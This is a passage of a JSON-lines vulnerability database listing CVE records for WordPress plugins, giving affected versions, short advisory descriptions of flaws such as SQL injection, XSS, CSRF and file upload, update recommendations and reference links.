version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f54cdad2-88db-4604-8064-fa6175176760?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f54cdad2-88db-4604-8064-fa6175176760?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?old_path=\\\/wpforo\\\/tags\\\/2.3.3&new_path=\\\/wpforo\\\/tags\\\/2.3.4&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?old_path=\\\/wpforo\\\/tags\\\/2.3.3&new_path=\\\/wpforo\\\/tags\\\/2.3.4&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6035","slug":"eazydocs","versionEndExcluding":"2.3.4","description":"The EazyDocs WordPress plugin before 2.3.4 does not properly sanitize and escape \"data\" parameter before using it in an SQL statement via an AJAX action, which could allow any authenticated users, such as subscribers, to perform SQL Injection attacks.","recommendation":"Update to version 2.3.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/44f5a29a-05f9-40d2-80f2-6fb2bda60d79\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/44f5a29a-05f9-40d2-80f2-6fb2bda60d79\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6585","slug":"wp-jobsearch","versionImpact":"2.3.3","versionEndExcluding":"2.3.4","description":"The WP JobSearch WordPress plugin before 2.3.4 does not validate files to be uploaded, which could allow unauthenticated attackers to upload arbitrary files such as PHP on the server.","recommendation":"Update to version 2.3.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/757412f4-e4f8-4007-8e3b-639a72b33180\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/757412f4-e4f8-4007-8e3b-639a72b33180\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6584","slug":"wp-jobsearch","versionImpact":"2.3.3","versionEndExcluding":"2.3.4","description":"The WP JobSearch WordPress plugin before 2.3.4 does not prevent attackers from logging in as any user with only the knowledge of that user's email address.","recommendation":"Update to version 2.3.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e528e3cd-a45c-4bf7-a37a-101f5c257acd\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e528e3cd-a45c-4bf7-a37a-101f5c257acd\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3649","slug":"wp-jquery-lightbox","versionImpact":"2.3.3","versionEndExcluding":"2.3.4","description":"The LightPress Lightbox WordPress plugin before 2.3.4 does not check download links point to valid, non-Javascript URLs, allowing users with at least the contributor role to conduct Stored XSS attacks.","recommendation":"Update to version 2.3.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/37fb7f3b-1766-4c2c-9b78-f77f15a04476\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/37fb7f3b-1766-4c2c-9b78-f77f15a04476\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9636","slug":"post-grid","versionImpact":"2.3.3","versionEndExcluding":"2.3.4","description":"The Post Grid and Gutenberg Blocks plugin for WordPress is vulnerable to privilege escalation in versions 2.2.85 to 2.3.3. This is due to the plugin not properly restricting what user meta can be updated during profile registration. This makes it possible for unauthenticated attackers to register on the site as an administrator.","recommendation":"Update to version 2.3.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/post-grid\\\/tags\\\/2.2.93\\\/includes\\\/blocks\\\/form-wrap\\\/functions.php#L3200\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/post-grid\\\/tags\\\/2.2.93\\\/includes\\\/blocks\\\/form-wrap\\\/functions.php#L3200\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3117675\\\/post-grid\\\/trunk\\\/includes\\\/blocks\\\/form-wrap\\\/functions.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3117675\\\/post-grid\\\/trunk\\\/includes\\\/blocks\\\/form-wrap\\\/functions.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3221012\\\/post-grid\\\/trunk\\\/includes\\\/blocks\\\/form-wrap\\\/functions.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3221012\\\/post-grid\\\/trunk\\\/includes\\\/blocks\\\/form-wrap\\\/functions.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1bbe01b8-24ed-4e1e-bafc-0f4dea96c1f3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1bbe01b8-24ed-4e1e-bafc-0f4dea96c1f3?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5167","slug":"user-activity-log-pro","versionImpact":"2.3.3","versionEndExcluding":"2.3.4","description":"The User Activity Log Pro WordPress plugin before 2.3.4 does not properly escape recorded User-Agents in the user activity logs dashboard, which may allow visitors to conduct Stored Cross-Site Scripting attacks.","recommendation":"Update to version 2.3.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/78ea6fe0-5fac-4923-949c-023c85fe2437\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/78ea6fe0-5fac-4923-949c-023c85fe2437\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5133","slug":"user-activity-log-pro","versionImpact":"2.3.3","versionEndExcluding":"2.3.4","description":"This user-activity-log-pro WordPress plugin before 2.3.4 retrieves client IP addresses from potentially untrusted headers, allowing an attacker to manipulate its value. This may be used to hide the source of malicious traffic.","recommendation":"Update to version 2.3.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/36c30e54-75e4-4df1-b01a-60c51c0e76a3\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/36c30e54-75e4-4df1-b01a-60c51c0e76a3\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-34029","slug":"disable-update-notifications","versionEndExcluding":"2.3.3","description":"Cross-Site Request Forgery (CSRF) vulnerability in Prem Tiwari Disable WordPress Update Notifications and auto-update Email Notifications plugin <=\u00a02.3.3 versions.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/disable-update-notifications\\\/wordpress-disable-wordpress-update-notifications-and-auto-update-email-notifications-plugin-2-3-3-cross-site-request-forgery-csrf-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/disable-update-notifications\\\/wordpress-disable-wordpress-update-notifications-and-auto-update-email-notifications-plugin-2-3-3-cross-site-request-forgery-csrf-vulnerability?_s_id=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5116","slug":"ipushpull","versionImpact":"2.3.2","versionEndExcluding":"2.3.3","description":"The Live updates from Excel plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'ipushpull_page' shortcode in versions up to, and including, 2.3.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.3.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ab856722-e954-49de-a93f-46664da6e3e8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ab856722-e954-49de-a93f-46664da6e3e8?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ipushpull\\\/trunk\\\/public\\\/class-ipushpull-public.php#L113\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ipushpull\\\/trunk\\\/public\\\/class-ipushpull-public.php#L113\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13337","slug":"clearfy","versionImpact":"2.3.2","versionEndExcluding":"2.3.3","description":"The Clearfy Cache \u2013 WordPress optimization plugin, Minify HTML, CSS & JS, Defer plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.3.2. This is due to missing or incorrect nonce validation on the 'setup-wbcr_clearfy' page. This makes it possible for unauthenticated attackers to update the plugins settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 2.3.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/github.dev\\\/WordPressPluginDirectory\\\/clearfy\",\"name\":\"https:\\\/\\\/github.dev\\\/WordPressPluginDirectory\\\/clearfy\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3268278\\\/clearfy\\\/trunk\\\/libs\\\/factory\\\/templates\\\/pages\\\/setup-parts\\\/class-step-form.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3268278\\\/clearfy\\\/trunk\\\/libs\\\/factory\\\/templates\\\/pages\\\/setup-parts\\\/class-step-form.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d7f21dbe-f300-4336-9980-a69d40395f39?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d7f21dbe-f300-4336-9980-a69d40395f39?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13535","slug":"actionwear-products-sync","versionImpact":"2.3.2","versionEndExcluding":"2.3.3","description":"The Actionwear products sync plugin for WordPress is vulnerable to Full Path Disclosure in all versions up to, and including, 2.3.0. This is due to the composer-setup.php file being publicly accessible with 'display_errors' set to true. This makes it possible for unauthenticated attackers to retrieve the full path of the web application, which can be used to aid other attacks. The information displayed is not useful on its own, and requires another vulnerability to be present for damage to an affected website.","recommendation":"Update to version 2.3.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/actionwear-products-sync\\\/trunk\\\/composer-setup.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/actionwear-products-sync\\\/trunk\\\/composer-setup.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6dbf9689-c812-4b7c-9df3-c4639aae3357?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6dbf9689-c812-4b7c-9df3-c4639aae3357?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13434","slug":"wp-inventory-manager","versionImpact":"2.3.2","versionEndExcluding":"2.3.3","description":"The WP Inventory Manager plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'message' parameter in all versions up to, and including, 2.3.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 2.3.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3223184%40wp-inventory-manager&new=3223184%40wp-inventory-manager&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3223184%40wp-inventory-manager&new=3223184%40wp-inventory-manager&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7e3069d4-12b8-4949-9daf-0e01590799da?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7e3069d4-12b8-4949-9daf-0e01590799da?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3587","slug":"auxin-portfolio","versionImpact":"2.3.2","versionEndExcluding":"2.3.3","description":"The Premium Portfolio Features for Phlox theme plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Grid Portfolios Widget in all versions up to, and including, 2.3.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.3.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b0ea041b-f09d-4c62-aada-26afbc60b6f2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b0ea041b-f09d-4c62-aada-26afbc60b6f2?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/auxin-portfolio\\\/tags\\\/2.3.2\\\/public\\\/templates\\\/elements\\\/recent-portfolio.php#L179\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/auxin-portfolio\\\/tags\\\/2.3.2\\\/public\\\/templates\\\/elements\\\/recent-portfolio.php#L179\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3115537\\\/auxin-portfolio\\\/trunk\\\/public\\\/templates\\\/elements\\\/recent-portfolio.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3115537\\\/auxin-portfolio\\\/trunk\\\/public\\\/templates\\\/elements\\\/recent-portfolio.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-50845","slug":"geodirectory","versionEndExcluding":"2.3.29","description":"Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in AyeCode - WordPress Business Directory Plugins GeoDirectory \u2013 WordPress Business Directory Plugin, or Classified Directory. This issue affects GeoDirectory \u2013 WordPress Business Directory Plugin, or Classified Directory: from n\/a through 2.3.28.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/geodirectory\\\/wordpress-geodirectory-plugin-2-3-28-sql-injection-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/geodirectory\\\/wordpress-geodirectory-plugin-2-3-28-sql-injection-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4759","slug":"gigpress","versionEndExcluding":"2.3.28","description":"The GigPress WordPress plugin before 2.3.28 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embedded, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/63328927-5614-4fa1-8f46-46ff0c8eb959\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/63328927-5614-4fa1-8f46-46ff0c8eb959\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0171","slug":"jquery-t-countdown-widget","versionEndExcluding":"2.3.24","description":"The jQuery T(-) Countdown Widget WordPress plugin before 2.3.24 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embedded, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/32324655-ff91-4a53-a2c5-ebe6678d4a9d\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/32324655-ff91-4a53-a2c5-ebe6678d4a9d\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2020-36731","slug":"flexible-checkout-fields","versionEndExcluding":"2.3.2","description":"The Flexible Checkout Fields for WooCommerce plugin for WordPress is vulnerable to Unauthenticated Arbitrary Plugin Settings update, in addition to Stored Cross-Site Scripting in versions up to, and including, 2.3.1. This is due to missing authorization checks on the updateSettingsAction() function which is called via an admin_init hook, along with missing sanitization and escaping on the settings that are stored.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fd12a952-2e99-41f7-b74c-55c2b7d8deed?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fd12a952-2e99-41f7-b74c-55c2b7d8deed?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/zero-day-vulnerability-fixed-in-wordpress-flexible-checkout-fields-for-woocommerce-plugin\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/zero-day-vulnerability-fixed-in-wordpress-flexible-checkout-fields-for-woocommerce-plugin\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/blog\\\/2020\\\/02\\\/site-takeover-campaign-exploits-multiple-zero-day-vulnerabilities\\\/\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/blog\\\/2020\\\/02\\\/site-takeover-campaign-exploits-multiple-zero-day-vulnerabilities\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-7431","slug":"knowledgebase","versionImpact":"2.3.1","versionEndExcluding":"2.3.2","description":"The Knowledge Base plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin slug setting in all versions up to, and including, 2.3.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","recommendation":"Update to version 2.3.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/knowledgebase\\\/tags\\\/2.3.1\\\/includes\\\/admin\\\/settings\\\/class-settings.php#L290\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/knowledgebase\\\/tags\\\/2.3.1\\\/includes\\\/admin\\\/settings\\\/class-settings.php#L290\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b405b5cb-b330-4bd6-87bd-fa97ded58460?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b405b5cb-b330-4bd6-87bd-fa97ded58460?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13338","slug":"clearfy","versionImpact":"2.3.1","versionEndExcluding":"2.3.2","description":"The Clearfy Cache \u2013 WordPress optimization plugin, Minify HTML, CSS & JS, Defer plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.3.1. This is due to missing or incorrect nonce validation on the wclearfy_cache_delete functionality. This makes it possible for unauthenticated attackers to clear the cache via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 2.3.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3268278\\\/clearfy\\\/trunk\\\/components\\\/cache\\\/includes\\\/cache.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3268278\\\/clearfy\\\/trunk\\\/components\\\/cache\\\/includes\\\/cache.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e0a37ce4-9860-415e-bb88-545c30c95fc1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e0a37ce4-9860-415e-bb88-545c30c95fc1?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10683","slug":"contact-form-7-paypal-add-on","versionImpact":"2.3.1","versionEndExcluding":"2.3.2","description":"The Contact Form 7 \u2013 PayPal & Stripe Add-on plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg & remove_query_arg without appropriate escaping on the URL in all versions up to, and including, 2.3.1. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. This is only exploitable when the leave a review notice is present in the dashboard.","recommendation":"Update to version 2.3.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/49e741c9-0cc7-4a62-a920-4fd997bee280?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/49e741c9-0cc7-4a62-a920-4fd997bee280?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/contact-form-7-paypal-add-on\\\/tags\\\/2.3.1\\\/includes\\\/admin\\\/notices.php#L46\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/contact-form-7-paypal-add-on\\\/tags\\\/2.3.1\\\/includes\\\/admin\\\/notices.php#L46\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/contact-form-7-paypal-add-on\\\/tags\\\/2.3.1\\\/includes\\\/admin\\\/notices.php#L48\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/contact-form-7-paypal-add-on\\\/tags\\\/2.3.1\\\/includes\\\/admin\\\/notices.php#L48\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3182753\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3182753\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-44233","slug":"foogallery","versionImpact":"2.2.44","versionEndExcluding":"2.3.2","description":"Cross-Site Request Forgery (CSRF) vulnerability in FooPlugins Best WordPress Gallery Plugin \u2013 FooGallery plugin <=\u00a02.2.44 versions.","recommendation":"Update to version 2.3.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/foogallery\\\/wordpress-foogallery-plugin-2-2-44-cross-site-request-forgery-csrf-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/foogallery\\\/wordpress-foogallery-plugin-2-2-44-cross-site-request-forgery-csrf-vulnerability?_s_id=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-45370","slug":"comments-import-export-woocommerce","versionEndExcluding":"2.3.2","description":"Improper Neutralization of Formula Elements in a CSV File vulnerability in WebToffee WordPress Comments Import & Export. This issue affects WordPress Comments Import & Export: from n\/a through 2.3.1.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/comments-import-export-woocommerce\\\/wordpress-wordpress-comments-import-export-plugin-2-3-1-csv-injection?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/comments-import-export-woocommerce\\\/wordpress-wordpress-comments-import-export-plugin-2-3-1-csv-injection?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4354","slug":"tablepress","versionImpact":"2.3.1","versionEndExcluding":"2.3.2","description":"The TablePress \u2013 Tables in WordPress made easy plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 2.3 via the get_files_to_import() function. This makes it possible for authenticated attackers, with author-level access and above, to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services. Due to the complex nature of protecting against DNS rebind attacks in WordPress software, we settled on the developer simply restricting the usage of the URL import functionality to just administrators. While this is not optimal, we feel this poses a minimal risk to most site owners and ideally WordPress core would correct this issue in wp_safe_remote_get() and other functions.","recommendation":"Update to version 2.3.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/879384eb-bfea-4667-a7de-9f723dbea74b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/879384eb-bfea-4667-a7de-9f723dbea74b?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/tablepress\\\/trunk\\\/classes\\\/class-import.php#L125\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/tablepress\\\/trunk\\\/classes\\\/class-import.php#L125\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.clear-gate.com\\\/blog\\\/ssrf-with-dns-rebinding-2\\\/\",\"name\":\"https:\\\/\\\/www.clear-gate.com\\\/blog\\\/ssrf-with-dns-rebinding-2\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/tablepress\\\/trunk\\\/classes\\\/class-import.php#L141\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/tablepress\\\/trunk\\\/classes\\\/class-import.php#L141\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3097113%40tablepress&new=3097113%40tablepress&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3097113%40tablepress&new=3097113%40tablepress&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5035","slug":"easy-fancybox","versionImpact":"2.3.15","versionEndExcluding":"2.3.16","description":"The Firelight Lightbox WordPress plugin before 2.3.16 does not sanitise and escape title attributes before outputting them in the page, which could allow users with a role as low as contributors to perform stored Cross-Site Scripting attacks.","recommendation":"Update to version 2.3.16, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5dca30af-4624-4a71-93be-00fa8dc00c97\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5dca30af-4624-4a71-93be-00fa8dc00c97\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5dca30af-4624-4a71-93be-00fa8dc00c97\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5dca30af-4624-4a71-93be-00fa8dc00c97\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3597","slug":"easy-fancybox","versionImpact":"2.3.14","versionEndExcluding":"2.3.15","description":"The Firelight Lightbox WordPress plugin before 2.3.15 does not prevent users with post writing capabilities from executing arbitrary Javascript when the jQuery Metadata library is enabled. While this feature is meant to only be available to Pro version users, it can be activated in the free version too, making it theoretically exploitable there as well.","recommendation":"Update to version 2.3.15, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8bf5e107-6397-4946-aaee-bf61d3e2dffd\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8bf5e107-6397-4946-aaee-bf61d3e2dffd\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4091","slug":"responsive-gallery-grid","versionImpact":"2.3.14","versionEndExcluding":"2.3.15","description":"The Responsive Gallery Grid WordPress plugin before 2.3.15 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Cross-Site Scripting attacks even when unfiltered_html is disallowed.","recommendation":"Update to version 2.3.15, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e28e79fa-f461-41fe-ad1c-ca768ea5f982\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e28e79fa-f461-41fe-ad1c-ca768ea5f982\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
